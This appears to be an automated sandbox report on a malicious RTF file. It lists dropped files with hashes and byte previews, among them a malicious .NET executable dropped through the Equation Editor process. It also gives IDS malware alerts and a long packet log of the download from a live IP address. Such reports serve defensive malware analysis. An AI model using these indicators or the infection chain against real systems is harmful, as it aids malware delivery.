                                                            SHA-512:904BC0C64BEECBEE3C3D6539DEFD6D4F07AA2F46FB77144172DA5894271436E356DFC87A481DB06D2661F27C090CD1A0616E3F12230A04127AB3078A91108251
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.... ..."q..r..."q..r....C.....[j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.$..user.8......QK.X.X.$*...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.[j...X.$ .2FBEXX~1.RTF..J.......WF..WF.*.........................2.F.B.e.x.X.R.C.H.R...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\2FBexXRCHR.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.F.B.e.x.X.R.C.H.R...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:Generic INItialization configuration [folders]
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.676725395303504
                                                            Encrypted:false
                                                            SSDEEP:3:Hj93mxpzCm4s93mxpzCv:HjVmx5Vmx2
                                                            MD5:A23E46D308B82E50DA6081BF01EBC0B9
                                                            SHA1:4D064ABEFB376A3BB5DB4BC4EBA87A0BFCE871AA
                                                            SHA-256:FCBE0BD08B873A7BF5100BAAA186ED4BAA5C4FE8A82286F462166F4E3E51F157
                                                            SHA-512:41621B388A15BD7B54751B4D491AAF29938E9B5D22C44E0BAC8713899B71A32998E2CE85565555D808E70ACCA72B3BE5600F140399747F63D8B336B4DCD6BFED
                                                            Malicious:false
                                                            Preview:[misc]..2FBexXRCHR.LNK=0..[folders]..2FBexXRCHR.LNK=0..
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.4797606462020307
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                            MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                            SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                            SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                            SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):671744
                                                            Entropy (8bit):7.848719392804634
                                                            Encrypted:false
                                                            SSDEEP:12288:6ChcU7r3FL0YtcCCvLLgov4CnDUOt7TDM2DG0oSb3fqEVzXfmhujHeis3c:Jco3FYYtajLX4stTA2DGbSeEUh+ei8c
                                                            MD5:3D33CBDE84D0A1197EC0D459D634473E
                                                            SHA1:ABD0074C5B2EED8FBAB4D30443CEAC4B403AD09D
                                                            SHA-256:33647CF1D7BA05386D44A608A94979925883F8E8C0E5F63B3F2E7FFDC7380461
                                                            SHA-512:36F31309DDDF020FD9FEE7C44D8847924C4F8A9306A7F04DFA15FD2B73645C982F98D4B7A616B2B31D4B3C14510F2858608BEDA519EB8475780B544A4EEDCEA1
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0......@......B.... ........@.. ... ...................@... ........@.....................................O............................ ....................................................... ............... ..H............text...H.... ....... .............. ..`.rsrc............ ..................@..@.reloc....... ... ... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.4797606462020307
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                            MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                            SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                            SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                            SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                            Malicious:false
                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            File type:Rich Text Format data, version 1
                                                            Entropy (8bit):2.8000023315315508
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:2FBexXRCHR.rtf
                                                            File size:92'763 bytes
                                                            MD5:02e73ef6a6bde5caa7628ee916111f60
                                                            SHA1:85fcd05b810401dffc45b6c2cb831787a8a131d3
                                                            SHA256:a74f7219f672e155f20c501b9285630b07e70922c058fa3713c29012b8cbdb8c
                                                            SHA512:b8c529090265796d41b354455ff799e8a2052f7ed68772abcfabeb39265974ca678ed7795b7c80202fae25f2f2b5ee2917e4680629dd65f44d56960a8e27d69c
                                                            SSDEEP:384:/0kgUrKbZx8JmEAGNygqZ9Z8bB4GviVYgBzv5i/QG6luWjSsmPbkFJ:TgUr2Z+yVZznSGzvg4GYui1mPoJ
                                                            TLSH:3393F198D78F41A6CF54A33B132B0A8805FDB73EB30515A674AC837537AEC2D44A95BC
                                                            File Content Preview:{\rtf1.......{\*\fRelChangePage280277307 \(}.{\973429615*[)1<,7!!8/.'&511`1=7?8<~!._8|#2.1_~?-+3^?;~~??[:'0>?8._]&:?-;;@1.#/#+$%?/(%.7.?,%?4&^>?>1%9`78>(!:(?573!=';=+`0..0?7~!?*>.=@]56.5>$%-2.?,%'4<;.'&@.7%)*)!6@$@>%?%>?037#&?]5:/3:?01=7~1?52_*_?.^=?=;+]6
                                                            Icon Hash:2764a3aaaeb7bdbf
                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000001D9Dhno
                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                            2024-07-26T06:39:08.862254+0200TCP2022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M18049163198.46.174.139192.168.2.22
                                                            2024-07-26T06:39:09.043752+0200TCP2022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M28049163198.46.174.139192.168.2.22
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 26, 2024 06:39:08.320808887 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.334347010 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.334682941 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.334826946 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.339840889 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.861911058 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.861965895 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862008095 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862015963 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862147093 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862183094 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862216949 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862220049 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862220049 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862220049 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862253904 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862267971 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862303019 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862747908 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862782001 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862816095 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862818003 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.862848997 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.862869978 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.866883039 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.866990089 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.867048979 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.867609978 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.867743969 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.952476025 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.952553034 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.952558994 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.952774048 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.952809095 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.952826977 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.952850103 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.957299948 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.957334042 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.957374096 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.957479000 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.957484007 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.957514048 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.957586050 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.962027073 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.962064028 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.962091923 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.962096930 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.962150097 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.962215900 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.962250948 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.962285042 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.962306976 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.966842890 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.966877937 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.966897964 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.966917038 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.966949940 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.966986895 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.967039108 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.971579075 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.971613884 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.971646070 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.971683025 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.971718073 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.971718073 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.971743107 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.971777916 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:08.971832037 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:08.971961021 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.043751955 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.043811083 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.043826103 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.043844938 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.043865919 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.043895006 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.044079065 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.044166088 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.048631907 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.048666954 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.048698902 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.048727036 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.049006939 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.049040079 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.049061060 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.049091101 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.053421021 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.053455114 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.053489923 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.053491116 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.053777933 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.053812027 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.053857088 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.053862095 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.053905964 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.053951025 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.058206081 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.058257103 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.058283091 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.058311939 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.059339046 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.059372902 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.059412956 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.059412956 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.063043118 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.063076973 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.063119888 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.063119888 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.064106941 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.064146996 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.064167023 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.064192057 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.067801952 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.067835093 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.067856073 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.067866087 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.067874908 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.067913055 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068106890 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068140030 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068157911 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068197966 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068242073 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068253994 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068276882 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068289995 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068571091 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068809032 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068867922 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068909883 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068944931 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.068962097 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.068977118 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069010973 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069020987 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069044113 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069057941 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069092035 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069785118 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069818974 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069838047 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069852114 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069883108 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069886923 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069905043 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069921017 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069941044 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.069957972 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.069972038 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.070003033 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134556055 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134608030 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134620905 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134641886 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134659052 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134679079 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134690046 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134723902 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134793997 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134826899 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134843111 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134861946 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.134865999 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.134910107 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.135227919 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.135281086 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.135395050 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.135445118 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.135509968 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.135559082 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.135729074 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.135761976 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.135778904 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.135798931 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136056900 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.136090040 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.136106014 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136130095 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136569023 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.136621952 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136667013 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.136701107 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.136714935 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136744022 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.136995077 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137027979 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137044907 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137068033 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137458086 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137506008 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137571096 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137603998 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137615919 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137747049 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137840986 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137876987 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.137890100 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.137918949 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.138360977 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.138410091 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.138477087 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.138509989 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.138520002 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.138549089 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.138787985 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.138819933 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.138834953 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.138861895 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.139296055 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.139348030 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.139380932 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.139413118 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.139427900 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.139455080 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.139624119 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.139657021 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.139676094 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.139688969 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.140152931 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.140206099 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.140279055 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.140311956 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.140325069 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.140352964 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.140538931 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.140574932 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.140589952 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.140618086 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141117096 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141169071 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141192913 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141225100 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141239882 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141268015 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141649008 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141697884 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141844034 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141894102 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.141957998 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.141989946 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.142007113 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.142033100 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.142200947 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.142234087 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.142249107 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.142275095 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.142807007 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.142858028 CEST8049163198.46.174.139192.168.2.22
                                                            Jul 26, 2024 06:39:09.142859936 CEST4916380192.168.2.22198.46.174.139
                                                            Jul 26, 2024 06:39:09.142900944 CEST4916380192.168.2.22198.46.174.139
